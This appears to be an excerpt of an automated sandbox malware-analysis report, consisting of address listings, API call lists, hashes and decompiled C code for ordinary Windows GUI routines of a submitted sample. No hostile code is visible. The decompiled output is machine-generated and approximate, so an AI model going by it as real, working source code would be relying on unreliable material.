                                                                                                                                                                                                                            0x0044ef1d
                                                                                                                                                                                                                            0x0044ef20
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ef2a
                                                                                                                                                                                                                            0x0044ef2f
                                                                                                                                                                                                                            0x0044ef31
                                                                                                                                                                                                                            0x0044ef3f
                                                                                                                                                                                                                            0x0044ef40
                                                                                                                                                                                                                            0x0044ef40
                                                                                                                                                                                                                            0x0044ef41
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ef31
                                                                                                                                                                                                                            0x0044ef38
                                                                                                                                                                                                                            0x0044ef38
                                                                                                                                                                                                                            0x0044ea9d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ea9d
                                                                                                                                                                                                                            0x0044ea97
                                                                                                                                                                                                                            0x0044ea94
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ea6a
                                                                                                                                                                                                                            0x0044ea6a
                                                                                                                                                                                                                            0x0044eaa8
                                                                                                                                                                                                                            0x0044eaa9
                                                                                                                                                                                                                            0x0044eaab
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eab1
                                                                                                                                                                                                                            0x0044eab1
                                                                                                                                                                                                                            0x0044eab2
                                                                                                                                                                                                                            0x0044eab2
                                                                                                                                                                                                                            0x0044eab4
                                                                                                                                                                                                                            0x0044eab9
                                                                                                                                                                                                                            0x0044eac2
                                                                                                                                                                                                                            0x0044eac7
                                                                                                                                                                                                                            0x0044eac9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eacf
                                                                                                                                                                                                                            0x0044ead0
                                                                                                                                                                                                                            0x0044ead0
                                                                                                                                                                                                                            0x0044ead1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ead3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ead3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ead1
                                                                                                                                                                                                                            0x0044eab4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ea6c
                                                                                                                                                                                                                            0x0044ea6c
                                                                                                                                                                                                                            0x0044ea6f
                                                                                                                                                                                                                            0x0044ecb2
                                                                                                                                                                                                                            0x0044ecbb
                                                                                                                                                                                                                            0x0044ecbc
                                                                                                                                                                                                                            0x0044ef5d
                                                                                                                                                                                                                            0x0044ef5f
                                                                                                                                                                                                                            0x0044ef62
                                                                                                                                                                                                                            0x0044ef65
                                                                                                                                                                                                                            0x0044ef72
                                                                                                                                                                                                                            0x0044ef72
                                                                                                                                                                                                                            0x0044ea76
                                                                                                                                                                                                                            0x0044ea6f
                                                                                                                                                                                                                            0x0044ea6a
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SaveDC.GDI32(?), ref: 0044ED0F
                                                                                                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 0044ED83
                                                                                                                                                                                                                            • 73C9B080.USER32(?,00000000,0044EF73), ref: 0044EDFD
                                                                                                                                                                                                                            • SaveDC.GDI32(?), ref: 0044EE34
                                                                                                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 0044EEA1
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044EF73), ref: 0044EF55
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: RestoreSave$B080NtdllProc_Window
                                                                                                                                                                                                                            • String ID: LbC
                                                                                                                                                                                                                            • API String ID: 4024241980-1054848185
                                                                                                                                                                                                                            • Opcode ID: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                                                                                                                                                                                            • Instruction ID: 9827756e5d0f78ec9e29d95b15367e488dbc04d0ac3e4e0047c09454960c1bc5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AE19D34A04605DFEB10DF6AC8819AEF3F5FF58304B2485AAE805A7361D738ED41CB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                            			E00441A14(void* __eax) {
                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                            				struct _WINDOWPLACEMENT _v56;
                                                                                                                                                                                                                            				struct tagPOINT _v64;
                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                            				struct HWND__* _t45;
                                                                                                                                                                                                                            				struct tagPOINT* _t47;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t47 =  &(_v64.y);
                                                                                                                                                                                                                            				_t43 = __eax;
                                                                                                                                                                                                                            				if(IsIconic( *(__eax + 0x180)) == 0) {
                                                                                                                                                                                                                            					GetWindowRect( *(_t43 + 0x180), _t47);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v56.length = 0x2c;
                                                                                                                                                                                                                            					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
                                                                                                                                                                                                                            					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
                                                                                                                                                                                                                            					if(_t45 != 0) {
                                                                                                                                                                                                                            						ScreenToClient(_t45, _t47);
                                                                                                                                                                                                                            						ScreenToClient(_t45,  &_v64);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *(_t43 + 0x40) = _t47->x;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
                                                                                                                                                                                                                            				return E0043A5D0(_t43);
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                                                                                                                            • String ID: ,
                                                                                                                                                                                                                            • API String ID: 2266315723-3772416878
                                                                                                                                                                                                                            • Opcode ID: facb28e0aef8c1a81de05685d9e83ea55f3ccb07f5ee46e9bac503663b8db04d
                                                                                                                                                                                                                            • Instruction ID: 7764449da7fe852df51dbb9cb86ecf5b737bbd4cbd6d31589173a55badb93002
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: facb28e0aef8c1a81de05685d9e83ea55f3ccb07f5ee46e9bac503663b8db04d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89118171908200ABDB01DE6DC885A9B77D8AF49354F04453EFD58EB291D739E9008BA6
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                            			E00453DA4(intOrPtr __eax, struct HWND__** __edx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				struct HDC__* _v20;
                                                                                                                                                                                                                            				struct HWND__* _v24;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				struct HWND__* _t92;
                                                                                                                                                                                                                            				intOrPtr _t112;
                                                                                                                                                                                                                            				intOrPtr _t115;
                                                                                                                                                                                                                            				struct HWND__* _t121;
                                                                                                                                                                                                                            				struct HWND__* _t124;
                                                                                                                                                                                                                            				intOrPtr _t128;
                                                                                                                                                                                                                            				struct HWND__* _t129;
                                                                                                                                                                                                                            				intOrPtr _t130;
                                                                                                                                                                                                                            				intOrPtr _t131;
                                                                                                                                                                                                                            				struct HWND__* _t133;
                                                                                                                                                                                                                            				struct HWND__* _t136;
                                                                                                                                                                                                                            				intOrPtr _t142;
                                                                                                                                                                                                                            				intOrPtr _t172;
                                                                                                                                                                                                                            				struct HDC__* _t177;
                                                                                                                                                                                                                            				struct HWND__** _t200;
                                                                                                                                                                                                                            				struct HWND__* _t218;
                                                                                                                                                                                                                            				struct HWND__* _t219;
                                                                                                                                                                                                                            				intOrPtr _t228;
                                                                                                                                                                                                                            				void* _t230;
                                                                                                                                                                                                                            				void* _t231;
                                                                                                                                                                                                                            				intOrPtr _t237;
                                                                                                                                                                                                                            				intOrPtr _t245;
                                                                                                                                                                                                                            				struct HWND__* _t249;
                                                                                                                                                                                                                            				struct HWND__* _t250;
                                                                                                                                                                                                                            				struct HWND__* _t255;
                                                                                                                                                                                                                            				struct HWND__* _t256;
                                                                                                                                                                                                                            				void* _t258;
                                                                                                                                                                                                                            				void* _t260;
                                                                                                                                                                                                                            				intOrPtr _t261;
                                                                                                                                                                                                                            				void* _t263;
                                                                                                                                                                                                                            				void* _t267;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t258 = _t260;
                                                                                                                                                                                                                            				_t261 = _t260 + 0xffffffec;
                                                                                                                                                                                                                            				_t200 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t92 =  *__edx;
                                                                                                                                                                                                                            				_t218 = _t92;
                                                                                                                                                                                                                            				_t263 = _t218 - 0x46;
                                                                                                                                                                                                                            				if(_t263 > 0) {
                                                                                                                                                                                                                            					_t219 = _t218 - 0xb01a;
                                                                                                                                                                                                                            					__eflags = _t219;
                                                                                                                                                                                                                            					if(_t219 == 0) {
                                                                                                                                                                                                                            						__eflags =  *(_v8 + 0xa0);
                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                            							E00403DE8(_v8, __eflags);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						__eflags = _t219 == 1;
                                                                                                                                                                                                                            						if(_t219 == 1) {
                                                                                                                                                                                                                            							__eflags =  *(_v8 + 0xa0);
                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                            								E00403DE8(_v8, __eflags);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							goto L41;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L43;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(_t263 == 0) {
                                                                                                                                                                                                                            						_t112 = _v8;
                                                                                                                                                                                                                            						_t228 =  *0x4541d8; // 0x1
                                                                                                                                                                                                                            						__eflags = _t228 - ( *(_t112 + 0x1c) &  *0x4541d4);
                                                                                                                                                                                                                            						if(_t228 == ( *(_t112 + 0x1c) &  *0x4541d4)) {
                                                                                                                                                                                                                            							_t115 = _v8;
                                                                                                                                                                                                                            							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
                                                                                                                                                                                                                            								_t128 = _v8;
                                                                                                                                                                                                                            								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
                                                                                                                                                                                                                            								if( *((char*)(_t128 + 0x22b)) != 2) {
                                                                                                                                                                                                                            									_t129 = __edx[2];
                                                                                                                                                                                                                            									_t26 = _t129 + 0x18;
                                                                                                                                                                                                                            									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
                                                                                                                                                                                                                            									__eflags =  *_t26;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
                                                                                                                                                                                                                            							__eflags = _t121;
                                                                                                                                                                                                                            							if(_t121 == 0) {
                                                                                                                                                                                                                            								L30:
                                                                                                                                                                                                                            								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
                                                                                                                                                                                                                            								__eflags = _t124;
                                                                                                                                                                                                                            								if(_t124 == 0) {
                                                                                                                                                                                                                            									L32:
                                                                                                                                                                                                                            									 *( *((intOrPtr*)(_t200 + 8)) + 0x18) =  *( *((intOrPtr*)(_t200 + 8)) + 0x18) | 0x00000001;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									__eflags = _t124 == 3;
                                                                                                                                                                                                                            									if(_t124 == 3) {
                                                                                                                                                                                                                            										goto L32;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								__eflags = _t121 == 2;
                                                                                                                                                                                                                            								if(_t121 == 2) {
                                                                                                                                                                                                                            									goto L30;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L43;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t230 = _t218 + 0xfffffffa - 3;
                                                                                                                                                                                                                            						if(_t230 < 0) {
                                                                                                                                                                                                                            							__eflags =  *0x49be6c;
                                                                                                                                                                                                                            							if( *0x49be6c != 0) {
                                                                                                                                                                                                                            								__eflags =  *__edx - 7;
                                                                                                                                                                                                                            								if( *__edx != 7) {
                                                                                                                                                                                                                            									goto L43;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t130 = _v8;
                                                                                                                                                                                                                            									__eflags =  *(_t130 + 0x1c) & 0x00000010;
                                                                                                                                                                                                                            									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_t255 = 0;
                                                                                                                                                                                                                            										_t131 = _v8;
                                                                                                                                                                                                                            										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
                                                                                                                                                                                                                            										if( *((char*)(_t131 + 0x22f)) != 2) {
                                                                                                                                                                                                                            											_t133 =  *(_v8 + 0x220);
                                                                                                                                                                                                                            											__eflags = _t133;
                                                                                                                                                                                                                            											if(_t133 != 0) {
                                                                                                                                                                                                                            												__eflags = _t133 - _v8;
                                                                                                                                                                                                                            												if(_t133 != _v8) {
                                                                                                                                                                                                                            													_t255 = E00441704(_t133);
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											_t136 = E004546D0(_v8);
                                                                                                                                                                                                                            											__eflags = _t136;
                                                                                                                                                                                                                            											if(_t136 != 0) {
                                                                                                                                                                                                                            												_t255 = E00441704(E004546D0(_v8));
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										__eflags = _t255;
                                                                                                                                                                                                                            										if(_t255 == 0) {
                                                                                                                                                                                                                            											goto L43;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											_t92 = SetFocus(_t255);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L44;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t231 = _t230 - 0x22;
                                                                                                                                                                                                                            							if(_t231 == 0) {
                                                                                                                                                                                                                            								_v24 = __edx[2];
                                                                                                                                                                                                                            								__eflags = _v24->i - 1;
                                                                                                                                                                                                                            								if(_v24->i != 1) {
                                                                                                                                                                                                                            									goto L43;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t142 = _v8;
                                                                                                                                                                                                                            									__eflags =  *(_t142 + 0x248);
                                                                                                                                                                                                                            									if( *(_t142 + 0x248) == 0) {
                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_t249 = E0044DD30( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
                                                                                                                                                                                                                            										__eflags = _t249;
                                                                                                                                                                                                                            										if(_t249 == 0) {
                                                                                                                                                                                                                            											goto L43;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											_v16 = E0042572C(0, 1);
                                                                                                                                                                                                                            											_push(_t258);
                                                                                                                                                                                                                            											_push(0x45401d);
                                                                                                                                                                                                                            											_push( *[fs:eax]);
                                                                                                                                                                                                                            											 *[fs:eax] = _t261;
                                                                                                                                                                                                                            											_v12 = SaveDC( *(_v24 + 0x18));
                                                                                                                                                                                                                            											_push(_t258);
                                                                                                                                                                                                                            											_push(0x454000);
                                                                                                                                                                                                                            											_push( *[fs:eax]);
                                                                                                                                                                                                                            											 *[fs:eax] = _t261;
                                                                                                                                                                                                                            											E00425CE8(_v16,  *(_v24 + 0x18));
                                                                                                                                                                                                                            											E00425B88(_v16);
                                                                                                                                                                                                                            											E0044F218(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
                                                                                                                                                                                                                            											_pop(_t237);
                                                                                                                                                                                                                            											 *[fs:eax] = _t237;
                                                                                                                                                                                                                            											_push(0x454007);
                                                                                                                                                                                                                            											__eflags = 0;
                                                                                                                                                                                                                            											E00425CE8(_v16, 0);
                                                                                                                                                                                                                            											return RestoreDC( *(_v24 + 0x18), _v12);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								if(_t231 == 1) {
                                                                                                                                                                                                                            									_t256 = __edx[2];
                                                                                                                                                                                                                            									__eflags = _t256->i - 1;
                                                                                                                                                                                                                            									if(_t256->i != 1) {
                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_t172 = _v8;
                                                                                                                                                                                                                            										__eflags =  *(_t172 + 0x248);
                                                                                                                                                                                                                            										if( *(_t172 + 0x248) == 0) {
                                                                                                                                                                                                                            											goto L43;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											_t250 = E0044DD30( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
                                                                                                                                                                                                                            											__eflags = _t250;
                                                                                                                                                                                                                            											if(_t250 == 0) {
                                                                                                                                                                                                                            												goto L43;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												_t177 = E00441704(_v8);
                                                                                                                                                                                                                            												L00407730();
                                                                                                                                                                                                                            												_v20 = _t177;
                                                                                                                                                                                                                            												 *[fs:eax] = _t261;
                                                                                                                                                                                                                            												_v16 = E0042572C(0, 1);
                                                                                                                                                                                                                            												 *[fs:eax] = _t261;
                                                                                                                                                                                                                            												_v12 = SaveDC(_v20);
                                                                                                                                                                                                                            												 *[fs:eax] = _t261;
                                                                                                                                                                                                                            												E00425CE8(_v16, _v20);
                                                                                                                                                                                                                            												E00425B88(_v16);
                                                                                                                                                                                                                            												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x454107, _t258,  *[fs:eax], 0x454124, _t258,  *[fs:eax], 0x45414b, _t258, _t177);
                                                                                                                                                                                                                            												_pop(_t245);
                                                                                                                                                                                                                            												 *[fs:eax] = _t245;
                                                                                                                                                                                                                            												_push(0x45410e);
                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                            												E00425CE8(_v16, 0);
                                                                                                                                                                                                                            												return RestoreDC(_v20, _v12);
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									L41:
                                                                                                                                                                                                                            									_t267 = _t92 -  *0x49ebc4; // 0xc089
                                                                                                                                                                                                                            									if(_t267 == 0) {
                                                                                                                                                                                                                            										E0043C130(_v8, 0, 0xb025, 0);
                                                                                                                                                                                                                            										E0043C130(_v8, 0, 0xb024, 0);
                                                                                                                                                                                                                            										E0043C130(_v8, 0, 0xb035, 0);
                                                                                                                                                                                                                            										E0043C130(_v8, 0, 0xb009, 0);
                                                                                                                                                                                                                            										E0043C130(_v8, 0, 0xb008, 0);
                                                                                                                                                                                                                            										E0043C130(_v8, 0, 0xb03d, 0);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									L43:
                                                                                                                                                                                                                            									_t92 = E0043F118(_v8, _t200);
                                                                                                                                                                                                                            									L44:
                                                                                                                                                                                                                            									return _t92;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            0x00453deb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453dbb
                                                                                                                                                                                                                            0x00453dbb
                                                                                                                                                                                                                            0x00453eae
                                                                                                                                                                                                                            0x00453ebc
                                                                                                                                                                                                                            0x00453ec3
                                                                                                                                                                                                                            0x00453ec6
                                                                                                                                                                                                                            0x00453ecc
                                                                                                                                                                                                                            0x00453ed6
                                                                                                                                                                                                                            0x00453ed8
                                                                                                                                                                                                                            0x00453eda
                                                                                                                                                                                                                            0x00453edd
                                                                                                                                                                                                                            0x00453ee4
                                                                                                                                                                                                                            0x00453ee6
                                                                                                                                                                                                                            0x00453ee9
                                                                                                                                                                                                                            0x00453ee9
                                                                                                                                                                                                                            0x00453ee9
                                                                                                                                                                                                                            0x00453ee9
                                                                                                                                                                                                                            0x00453ee4
                                                                                                                                                                                                                            0x00453ef6
                                                                                                                                                                                                                            0x00453ef6
                                                                                                                                                                                                                            0x00453ef8
                                                                                                                                                                                                                            0x00453f02
                                                                                                                                                                                                                            0x00453f0b
                                                                                                                                                                                                                            0x00453f0b
                                                                                                                                                                                                                            0x00453f0d
                                                                                                                                                                                                                            0x00453f17
                                                                                                                                                                                                                            0x00453f1a
                                                                                                                                                                                                                            0x00453f0f
                                                                                                                                                                                                                            0x00453f0f
                                                                                                                                                                                                                            0x00453f11
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453f11
                                                                                                                                                                                                                            0x00453efa
                                                                                                                                                                                                                            0x00453efa
                                                                                                                                                                                                                            0x00453efc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453efc
                                                                                                                                                                                                                            0x00453ef8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453dc1
                                                                                                                                                                                                                            0x00453dc4
                                                                                                                                                                                                                            0x00453dc7
                                                                                                                                                                                                                            0x00453df2
                                                                                                                                                                                                                            0x00453df9
                                                                                                                                                                                                                            0x00453dff
                                                                                                                                                                                                                            0x00453e02
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453e08
                                                                                                                                                                                                                            0x00453e08
                                                                                                                                                                                                                            0x00453e0b
                                                                                                                                                                                                                            0x00453e0f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453e15
                                                                                                                                                                                                                            0x00453e15
                                                                                                                                                                                                                            0x00453e17
                                                                                                                                                                                                                            0x00453e1a
                                                                                                                                                                                                                            0x00453e21
                                                                                                                                                                                                                            0x00453e43
                                                                                                                                                                                                                            0x00453e49
                                                                                                                                                                                                                            0x00453e4b
                                                                                                                                                                                                                            0x00453e4d
                                                                                                                                                                                                                            0x00453e50
                                                                                                                                                                                                                            0x00453e57
                                                                                                                                                                                                                            0x00453e57
                                                                                                                                                                                                                            0x00453e50
                                                                                                                                                                                                                            0x00453e23
                                                                                                                                                                                                                            0x00453e26
                                                                                                                                                                                                                            0x00453e2b
                                                                                                                                                                                                                            0x00453e2d
                                                                                                                                                                                                                            0x00453e3c
                                                                                                                                                                                                                            0x00453e3c
                                                                                                                                                                                                                            0x00453e2d
                                                                                                                                                                                                                            0x00453e59
                                                                                                                                                                                                                            0x00453e5b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453e61
                                                                                                                                                                                                                            0x00453e62
                                                                                                                                                                                                                            0x00453e62
                                                                                                                                                                                                                            0x00453e5b
                                                                                                                                                                                                                            0x00453e0f
                                                                                                                                                                                                                            0x00453e02
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453dc9
                                                                                                                                                                                                                            0x00453dc9
                                                                                                                                                                                                                            0x00453dcc
                                                                                                                                                                                                                            0x00453f26
                                                                                                                                                                                                                            0x00453f2c
                                                                                                                                                                                                                            0x00453f2f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453f35
                                                                                                                                                                                                                            0x00453f35
                                                                                                                                                                                                                            0x00453f38
                                                                                                                                                                                                                            0x00453f3f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453f45
                                                                                                                                                                                                                            0x00453f5b
                                                                                                                                                                                                                            0x00453f5d
                                                                                                                                                                                                                            0x00453f5f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453f65
                                                                                                                                                                                                                            0x00453f71
                                                                                                                                                                                                                            0x00453f76
                                                                                                                                                                                                                            0x00453f77
                                                                                                                                                                                                                            0x00453f7c
                                                                                                                                                                                                                            0x00453f7f
                                                                                                                                                                                                                            0x00453f8e
                                                                                                                                                                                                                            0x00453f93
                                                                                                                                                                                                                            0x00453f94
                                                                                                                                                                                                                            0x00453f99
                                                                                                                                                                                                                            0x00453f9c
                                                                                                                                                                                                                            0x00453fa8
                                                                                                                                                                                                                            0x00453fbb
                                                                                                                                                                                                                            0x00453fd3
                                                                                                                                                                                                                            0x00453fda
                                                                                                                                                                                                                            0x00453fdd
                                                                                                                                                                                                                            0x00453fe0
                                                                                                                                                                                                                            0x00453fe5

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: RestoreSave$B080Focus
                                                                                                                                                                                                                            • String ID: LbC
                                                                                                                                                                                                                            • API String ID: 809140284-1054848185
                                                                                                                                                                                                                            • Opcode ID: 9ec593775dbac7e468da3440c33bd0948fb5aeb1ddc2f22738828f1b73fdd268
                                                                                                                                                                                                                            • Instruction ID: b33e20edd2ce9fca5c714fd75ef70db920f5be85b1e855ee555859ce0c1c913c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ec593775dbac7e468da3440c33bd0948fb5aeb1ddc2f22738828f1b73fdd268
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56B1D730A00504DFCB10DFA9D889AAFB7F5EB58305F5545A6F800AB352C738AE85DF58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 61%
